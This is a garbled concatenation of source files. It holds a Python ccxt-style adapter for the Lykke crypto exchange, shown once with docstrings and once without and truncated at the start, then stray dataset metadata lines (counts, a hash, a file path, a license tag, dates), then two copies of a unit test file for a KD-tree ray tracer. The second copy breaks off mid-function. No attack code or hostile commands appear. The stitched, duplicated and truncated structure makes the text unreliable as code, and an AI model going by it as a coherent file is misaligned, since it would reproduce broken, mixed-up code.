        """Fetch account balances via the private Wallets endpoint and
        normalize them into the unified ccxt balance structure."""
        self.load_markets()
        balances = self.privateGetWallets()
        result = {'info': balances}
        for i in range(0, len(balances)):
            balance = balances[i]
            currency = balance['AssetId']
            total = balance['Balance']
            used = balance['Reserved']
            # Free balance is whatever is not reserved.
            free = total - used
            result[currency] = {
                'free': free,
                'used': used,
                'total': total,
            }
        return self.parse_balance(result)

    def cancel_order(self, id, symbol=None, params={}):
        """Cancel order *id*. The symbol/params arguments are accepted for
        interface compatibility but not forwarded."""
        return self.privatePostOrdersIdCancel({'id': id})

    def create_order(self, symbol, type, side, amount, price=None, params={}):
        """Place a limit or market order.

        Market orders specify the asset being traded; limit orders
        specify a price. The exchange response carries no order id,
        so 'id' is returned as None.
        """
        self.load_markets()
        market = self.market(symbol)
        query = {
            'AssetPairId': market['id'],
            'OrderAction': self.capitalize(side),
            'Volume': amount,
        }
        if type == 'market':
            query['Asset'] = market['base'] if (side == 'buy') else market['quote']
        elif type == 'limit':
            query['Price'] = price
        # Dispatch to privatePostOrdersLimit / privatePostOrdersMarket.
        method = 'privatePostOrders' + self.capitalize(type)
        result = getattr(self, method)(self.extend(query, params))
        return {
            'id': None,
            'info': result,
        }

    def fetch_markets(self):
        """Fetch the asset pairs and convert them into unified market
        structures with precision/limit metadata."""
        markets = self.publicGetAssetPairs()
        result = []
        for i in range(0, len(markets)):
            market = markets[i]
            id = market['Id']
            base = market['BaseAssetId']
            quote = market['QuotingAssetId']
            base = self.common_currency_code(base)
            quote = self.common_currency_code(quote)
            symbol = market['Name']
            precision = {
                'amount': market['Accuracy'],
                'price': market['InvertedAccuracy'],
            }
            result.append({
                'id': id,
                'symbol': symbol,
                'base': base,
                'quote': quote,
                'active': True,
                'info': market,
                'lot': math.pow(10, -precision['amount']),
                'precision': precision,
                'limits': {
                    'amount': {
                        'min': math.pow(10, -precision['amount']),
                        'max': math.pow(10, precision['amount']),
                    },
                    'price': {
                        'min': math.pow(10, -precision['price']),
                        'max': math.pow(10, precision['price']),
                    },
                },
            })
        return result

    def parse_ticker(self, ticker, market=None):
        """Convert a raw AllAssetPairRates entry into a unified ticker.
        Only bid/ask are available; other fields are None."""
        # The endpoint supplies no timestamp, so use local time.
        timestamp = self.milliseconds()
        symbol = None
        if market:
            symbol = market['symbol']
        ticker = ticker['Result']
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': None,
            'low': None,
            'bid': float(ticker['Rate']['Bid']),
            'ask': float(ticker['Rate']['Ask']),
            'vwap': None,
            'open': None,
            'close': None,
            'first': None,
            'last': None,
            'change': None,
            'percentage': None,
            'average': None,
            'baseVolume': None,
            'quoteVolume': None,
            'info': ticker,
        }

    def fetch_ticker(self, symbol, params={}):
        """Fetch the current bid/ask for *symbol* via the mobile API."""
        self.load_markets()
        market = self.market(symbol)
        ticker = self.mobileGetAllAssetPairRatesMarket(self.extend({
            'market': market['id'],
        }, params))
        return self.parse_ticker(ticker, market)

    def parse_order_status(self, status):
        """Map Lykke order statuses onto unified statuses; error-like
        statuses are passed through unchanged."""
        if status == 'Pending':
            return 'open'
        elif status == 'InOrderBook':
            return 'open'
        elif status == 'Processing':
            return 'open'
        elif status == 'Matched':
            return 'closed'
        elif status == 'Cancelled':
            return 'canceled'
        elif status == 'NotEnoughFunds':
            return 'NotEnoughFunds'
        elif status == 'NoLiquidity':
            return 'NoLiquidity'
        elif status == 'UnknownAsset':
            return 'UnknownAsset'
        elif status == 'LeadToNegativeSpread':
            return 'LeadToNegativeSpread'
        return status

    def parse_order(self, order, market=None):
        """Convert a raw order dict into the unified order structure."""
        status = self.parse_order_status(order['Status'])
        symbol = None
        if not market:
            # Resolve the market from the order's asset pair when possible.
            if 'AssetPairId' in order:
                if order['AssetPairId'] in self.markets_by_id:
                    market = self.markets_by_id[order['AssetPairId']]
        if market:
            symbol = market['symbol']
        # Prefer the most recent timestamp field available.
        timestamp = None
        if 'LastMatchTime' in order:
            timestamp = self.parse8601(order['LastMatchTime'])
        elif 'Registered' in order:
            timestamp = self.parse8601(order['Registered'])
        elif 'CreatedAt' in order:
            timestamp = self.parse8601(order['CreatedAt'])
        price = self.safe_float(order, 'Price')
        amount = self.safe_float(order, 'Volume')
        remaining = self.safe_float(order, 'RemainingVolume')
        filled = amount - remaining
        cost = filled * price
        result = {
            'info': order,
            'id': order['Id'],
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': symbol,
            'type': None,
            'side': None,
            'price': price,
            'cost': cost,
            'average': None,
            'amount': amount,
            'filled': filled,
            'remaining': remaining,
            'status': status,
            'fee': None,
        }
        return result

    def fetch_order(self, id, symbol=None, params={}):
        """Fetch a single order by id."""
        response = self.privateGetOrdersId(self.extend({
            'id': id,
        }, params))
        return self.parse_order(response)

    def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch all orders; filtering by symbol is not supported by the
        endpoint, so the symbol argument is ignored."""
        response = self.privateGetOrders()
        return self.parse_orders(response, None, since, limit)

    def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch orders currently resting in the order book."""
        response = self.privateGetOrders(self.extend({
            'status': 'InOrderBook',
        }, params))
        return self.parse_orders(response, None, since, limit)

    def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
        """Fetch fully matched (closed) orders."""
        response = self.privateGetOrders(self.extend({
            'status': 'Matched',
        }, params))
        return self.parse_orders(response, None, since, limit)

    def fetch_order_book(self, symbol, limit=None, params={}):
        """Fetch and merge the per-side order book responses into a single
        unified order book; the newest side timestamp wins."""
        self.load_markets()
        response = self.publicGetOrderBooksAssetPairId(self.extend({
            'AssetPairId': self.market_id(symbol),
        }, params))
        orderbook = {
            'timestamp': None,
            'bids': [],
            'asks': [],
        }
        timestamp = None
        for i in range(0, len(response)):
            side = response[i]
            if side['IsBuy']:
                orderbook['bids'] = self.array_concat(orderbook['bids'], side['Prices'])
            else:
                orderbook['asks'] = self.array_concat(orderbook['asks'], side['Prices'])
            timestamp = self.parse8601(side['Timestamp'])
            if not orderbook['timestamp']:
                orderbook['timestamp'] = timestamp
            else:
                orderbook['timestamp'] = max(orderbook['timestamp'], timestamp)
        if not timestamp:
            timestamp = self.milliseconds()
        return self.parse_order_book(orderbook, orderbook['timestamp'], 'bids', 'asks', 'Price', 'Volume')

    def parse_bid_ask(self, bidask, priceKey=0, amountKey=1):
        """Parse one [price, volume] level; volumes can arrive negative
        (sell side), so the absolute value is used."""
        price = float(bidask[priceKey])
        amount = float(bidask[amountKey])
        if amount < 0:
            amount = -amount
        return [price, amount]

    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the url/method/body/headers for a request; private calls
        attach the api-key header and JSON-encode POST bodies."""
        url = self.urls['api'][api] + '/' + self.implode_params(path, params)
        query = self.omit(params, self.extract_params(path))
        if api == 'public':
            if query:
                url += '?' + self.urlencode(query)
        elif api == 'private':
            if method == 'GET':
                if query:
                    url += '?' + self.urlencode(query)
            self.check_required_credentials()
            headers = {
                'api-key': self.apiKey,
                'Accept': 'application/json',
                'Content-Type': 'application/json',
            }
            if method == 'POST':
                if params:
                    body = self.json(params)
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
| 35.849275
| 126
| 0.467416
|
ge import Exchange
import math
class lykke (Exchange):
def describe(self):
return self.deep_extend(super(lykke, self).describe(), {
'id': 'lykke',
'name': 'Lykke',
'countries': 'CH',
'version': 'v1',
'rateLimit': 200,
'has': {
'CORS': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchOrders': True,
},
'requiredCredentials': {
'apiKey': True,
'secret': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/34487620-3139a7b0-efe6-11e7-90f5-e520cef74451.jpg',
'api': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-api.lykke.com/api',
'private': 'https://hft-api.lykke.com/api',
'test': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-service-dev.lykkex.net/api',
'private': 'https://hft-service-dev.lykkex.net/api',
},
},
'www': 'https://www.lykke.com',
'doc': [
'https://hft-api.lykke.com/swagger/ui/',
'https://www.lykke.com/lykke_api',
],
'fees': 'https://www.lykke.com/trading-conditions',
},
'api': {
'mobile': {
'get': [
'AllAssetPairRates/{market}',
],
},
'public': {
'get': [
'AssetPairs',
'AssetPairs/{id}',
'IsAlive',
'OrderBooks',
'OrderBooks/{AssetPairId}',
],
},
'private': {
'get': [
'Orders',
'Orders/{id}',
'Wallets',
],
'post': [
'Orders/limit',
'Orders/market',
'Orders/{id}/Cancel',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.0,
'taker': 0.0,
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {
'BTC': 0.001,
},
'deposit': {
'BTC': 0,
},
},
},
})
def fetch_balance(self, params={}):
self.load_markets()
balances = self.privateGetWallets()
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currency = balance['AssetId']
total = balance['Balance']
used = balance['Reserved']
free = total - used
result[currency] = {
'free': free,
'used': used,
'total': total,
}
return self.parse_balance(result)
def cancel_order(self, id, symbol=None, params={}):
return self.privatePostOrdersIdCancel({'id': id})
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
query = {
'AssetPairId': market['id'],
'OrderAction': self.capitalize(side),
'Volume': amount,
}
if type == 'market':
query['Asset'] = market['base'] if (side == 'buy') else market['quote']
elif type == 'limit':
query['Price'] = price
method = 'privatePostOrders' + self.capitalize(type)
result = getattr(self, method)(self.extend(query, params))
return {
'id': None,
'info': result,
}
def fetch_markets(self):
markets = self.publicGetAssetPairs()
result = []
for i in range(0, len(markets)):
market = markets[i]
id = market['Id']
base = market['BaseAssetId']
quote = market['QuotingAssetId']
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = market['Name']
precision = {
'amount': market['Accuracy'],
'price': market['InvertedAccuracy'],
}
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': True,
'info': market,
'lot': math.pow(10, -precision['amount']),
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision['amount']),
'max': math.pow(10, precision['amount']),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': math.pow(10, precision['price']),
},
},
})
return result
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
symbol = None
if market:
symbol = market['symbol']
ticker = ticker['Result']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['Rate']['Bid']),
'ask': float(ticker['Rate']['Ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': None,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.mobileGetAllAssetPairRatesMarket(self.extend({
'market': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_order_status(self, status):
if status == 'Pending':
return 'open'
elif status == 'InOrderBook':
return 'open'
elif status == 'Processing':
return 'open'
elif status == 'Matched':
return 'closed'
elif status == 'Cancelled':
return 'canceled'
elif status == 'NotEnoughFunds':
return 'NotEnoughFunds'
elif status == 'NoLiquidity':
return 'NoLiquidity'
elif status == 'UnknownAsset':
return 'UnknownAsset'
elif status == 'LeadToNegativeSpread':
return 'LeadToNegativeSpread'
return status
def parse_order(self, order, market=None):
status = self.parse_order_status(order['Status'])
symbol = None
if not market:
if 'AssetPairId' in order:
if order['AssetPairId'] in self.markets_by_id:
market = self.markets_by_id[order['AssetPairId']]
if market:
symbol = market['symbol']
timestamp = None
if 'LastMatchTime' in order:
timestamp = self.parse8601(order['LastMatchTime'])
elif 'Registered' in order:
timestamp = self.parse8601(order['Registered'])
elif 'CreatedAt' in order:
timestamp = self.parse8601(order['CreatedAt'])
price = self.safe_float(order, 'Price')
amount = self.safe_float(order, 'Volume')
remaining = self.safe_float(order, 'RemainingVolume')
filled = amount - remaining
cost = filled * price
result = {
'info': order,
'id': order['Id'],
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'price': price,
'cost': cost,
'average': None,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
}
return result
def fetch_order(self, id, symbol=None, params={}):
response = self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders()
return self.parse_orders(response, None, since, limit)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'InOrderBook',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'Matched',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
response = self.publicGetOrderBooksAssetPairId(self.extend({
'AssetPairId': self.market_id(symbol),
}, params))
orderbook = {
'timestamp': None,
'bids': [],
'asks': [],
}
timestamp = None
for i in range(0, len(response)):
side = response[i]
if side['IsBuy']:
orderbook['bids'] = self.array_concat(orderbook['bids'], side['Prices'])
else:
orderbook['asks'] = self.array_concat(orderbook['asks'], side['Prices'])
timestamp = self.parse8601(side['Timestamp'])
if not orderbook['timestamp']:
orderbook['timestamp'] = timestamp
else:
orderbook['timestamp'] = max(orderbook['timestamp'], timestamp)
if not timestamp:
timestamp = self.milliseconds()
return self.parse_order_book(orderbook, orderbook['timestamp'], 'bids', 'asks', 'Price', 'Volume')
def parse_bid_ask(self, bidask, priceKey=0, amountKey=1):
price = float(bidask[priceKey])
amount = float(bidask[amountKey])
if amount < 0:
amount = -amount
return [price, amount]
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
self.check_required_credentials()
headers = {
'api-key': self.apiKey,
'Accept': 'application/json',
'Content-Type': 'application/json',
}
if method == 'POST':
if params:
body = self.json(params)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
| true
| true
|
f7051dc01ebdfbe27bb258f790b4db971830c134
| 17,851
|
py
|
Python
|
unittests/ray_tracer/test_kdtree.py
|
nasa/giant
|
1e939272d9a0ca533b4da400d132f854520f3adc
|
[
"NASA-1.3"
] | 5
|
2021-09-10T14:29:19.000Z
|
2022-01-13T20:15:01.000Z
|
unittests/ray_tracer/test_kdtree.py
|
nasa/giant
|
1e939272d9a0ca533b4da400d132f854520f3adc
|
[
"NASA-1.3"
] | null | null | null |
unittests/ray_tracer/test_kdtree.py
|
nasa/giant
|
1e939272d9a0ca533b4da400d132f854520f3adc
|
[
"NASA-1.3"
] | 2
|
2021-10-01T18:39:13.000Z
|
2021-12-30T08:53:08.000Z
|
from unittest import TestCase, skip
import copy
import numpy as np
from giant import rotations as at
from giant.ray_tracer import kdtree, shapes, rays
class TestKDTree(TestCase):
    def setUp(self):
        """Build the triangle fixtures shared by the tests: four triangles
        spread along x, plus a variant with two triangles duplicated
        2.5 higher along z."""
        self.max_depth = 4
        # Base triangle (3x3 array of vertex columns) in the z=0 plane.
        tri1 = np.array([[-5, -4, -4.5],
                         [0, 0, 1],
                         [0, 0, 0]])
        # Three copies, each shifted a further +2.5 along x.
        tri2 = tri1+np.array([[2.5, 0, 0]]).T
        tri3 = tri2+np.array([[2.5, 0, 0]]).T
        tri4 = tri3+np.array([[2.5, 0, 0]]).T
        self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1,
                                           np.arange(12).reshape(-1, 3))
        self.shapes = self.triangles
        # Same first two triangles, stacked again at z = 2.5.
        self.stacked_tries = shapes.Triangle64(np.hstack([tri1, tri2,
                                                          tri1+[[0], [0], [2.5]],
                                                          tri2 + [[0], [0], [2.5]]]).T, 1,
                                               np.arange(12).reshape(-1, 3))
    def test_creation(self):
        """A new KDTree stores the max depth and surface it was given."""
        tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
        self.assertEqual(tree.max_depth, self.max_depth)
        self.assertEqual(tree.surface, self.shapes)
    def test_build(self):
        """Building the tree yields the expected two-level node layout:
        a root with two interior children, each holding two leaves."""
        tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
        tree.build(force=True, print_progress=False)
        facets = np.arange(12).reshape(-1, 3)
        # One single-facet Triangle64 per face, with bounding boxes
        # stripped so node equality compares only the geometry.
        tris = [shapes.Triangle64(self.triangles.vertices, self.triangles.albedos, face)
                for face in facets]
        for tri in tris:
            tri.bounding_box = None
        # Expected leaf nodes.
        node20 = kdtree.KDNode(tris[0])
        node21 = kdtree.KDNode(tris[1])
        node22 = kdtree.KDNode(tris[2])
        node23 = kdtree.KDNode(tris[3])
        # Expected interior nodes with hand-computed bounding boxes.
        node10 = kdtree.KDNode()
        node10.bounding_box = shapes.AxisAlignedBoundingBox([-5, 0, 0], [-1.5, 1, 0])
        node10.left = node20
        node10.right = node21
        node11 = kdtree.KDNode()
        node11.bounding_box = shapes.AxisAlignedBoundingBox([0., 0, 0], [3.5, 1, 0])
        node11.left = node22
        node11.right = node23
        # Expected root spanning the whole surface.
        node00 = kdtree.KDNode()
        node00.bounding_box = self.triangles.bounding_box
        node00.left = node10
        node00.right = node11
        node00.order = 0
        self.assertEqual(node00, tree.root)
def test_trace(self):
with self.subTest(stacked=False):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, 0.5, 3],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 1, 1]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.left.right, tree.root.right.left, tree.root.right.right]
with self.subTest(rotation=None, translation=None):
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertFalse(int_check["check"])
self.assertTrue(np.isnan(int_check["intersect"]).all())
self.assertTrue(np.isnan(int_check["normal"]).all())
self.assertTrue(np.isnan(int_check["albedo"]))
self.assertEqual(int_check["facet"], -1)
rotation = at.Rotation([0, 0, -np.pi / 2])
rays_test.ignore = None
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [0, 0, -0.5]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1.5])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(rotation=rotation, translation=translation):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1.5])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
rotation = at.Rotation([np.pi / 2, 0, 0])
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [2.5, 0, 0]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"][0])
for ind, int_check in enumerate(ints[1:]):
ind += 1
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind-1])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind-1].id*(10**(tc.root.order+1)))
translation = [0, -0.5, 0]
with self.subTest(rotation=rotation, translation=translation):
with self.subTest(order='rt'):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1.5, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(order='tr'):
tc = copy.deepcopy(tree)
tc.translate(translation)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0, 0, 0, 0]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(stacked=True):
tree = kdtree.KDTree(self.stacked_tries, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, -4.5, -2],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 5, 5]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.right.left, tree.root.left.right, tree.root.right.right]
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[0].id*(10**(tree.root.order+1)))
class TestKDNode(TestCase):
def setUp(self):
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1, np.arange(12).reshape(-1, 3))
def test_creation(self):
node = kdtree.KDNode(surface=self.triangles)
self.assertEqual(node.surface, self.triangles)
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
self.assertIsNone(node.left)
self.assertIsNone(node.right)
def test_compute_bounding_box(self):
node = kdtree.KDNode()
node.surface = self.triangles
node.has_surface = True
node.compute_bounding_box()
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
def test_split(self):
node = kdtree.KDNode(surface=self.triangles)
node.split(force=True, print_progress=False)
left_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6).reshape(3, -1), compute_bounding_box=False))
right_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6, 12).reshape(3, -1), compute_bounding_box=False))
self.assertEqual(node.left, left_tris)
self.assertEqual(node.right, right_tris)
def test_trace(self):
# TODO: figure out how to implement this
pass
| 35.702
| 142
| 0.493866
|
from unittest import TestCase, skip
import copy
import numpy as np
from giant import rotations as at
from giant.ray_tracer import kdtree, shapes, rays
class TestKDTree(TestCase):
def setUp(self):
self.max_depth = 4
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1,
np.arange(12).reshape(-1, 3))
self.shapes = self.triangles
self.stacked_tries = shapes.Triangle64(np.hstack([tri1, tri2,
tri1+[[0], [0], [2.5]],
tri2 + [[0], [0], [2.5]]]).T, 1,
np.arange(12).reshape(-1, 3))
def test_creation(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
self.assertEqual(tree.max_depth, self.max_depth)
self.assertEqual(tree.surface, self.shapes)
def test_build(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
facets = np.arange(12).reshape(-1, 3)
tris = [shapes.Triangle64(self.triangles.vertices, self.triangles.albedos, face)
for face in facets]
for tri in tris:
tri.bounding_box = None
node20 = kdtree.KDNode(tris[0])
